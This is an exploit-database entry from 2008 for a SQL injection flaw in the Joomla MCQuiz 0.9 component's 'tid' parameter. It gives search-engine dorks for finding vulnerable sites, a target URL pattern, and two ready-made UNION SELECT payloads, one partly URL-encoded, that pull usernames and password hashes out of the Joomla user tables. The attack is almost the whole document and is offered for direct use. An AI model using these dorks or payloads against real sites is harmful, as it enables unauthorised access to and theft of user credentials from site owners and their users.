id: 2638
date: 02/14/2008
title: Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability
author: S@BUN
cves: 

===================================================================
Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability
===================================================================



###############################################################
#
# joomla SQL Injection(com_mcquiz)
#
#
################################################################
#
# DORK 1 : allinurl: com_mcquiz "tid"
#
# DORK 2 : allinurl: com_mcquiz
#
################################################################

ATTACKER CAN SEE PASSWORD AND USERNAME UNDER PAGE

EXAMPLE=www.xxxxx.com/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOIT]

EXPLOIT=1=

1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*

EXPLOIT=2=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*



#  0day.today [2023-03-26]  #